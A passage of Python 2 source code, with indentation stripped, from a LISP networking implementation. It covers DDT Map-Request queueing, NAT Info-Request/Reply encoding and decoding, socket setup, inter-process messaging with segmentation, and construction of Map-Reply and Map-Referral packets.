self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix with
# EID-prefix-AFI set to 0. EID appened below follows with hostname
# or AFI=0:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 128)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
